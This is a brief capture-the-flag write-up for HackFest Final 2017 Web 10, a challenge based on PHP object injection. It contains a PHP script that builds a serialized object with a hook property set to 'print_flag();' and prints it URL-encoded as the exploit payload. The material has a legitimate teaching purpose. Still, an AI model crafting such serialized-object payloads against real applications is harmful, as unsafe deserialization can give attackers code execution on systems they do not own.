<-- home

HackFest Final 2017 / Web 10

Simple PHP Object Injection vulnerability

call print_flag()

<?php
class Hackfest
{
   private $hook = "print_flag();";

}
print urlencode(serialize(new Hackfest));
?>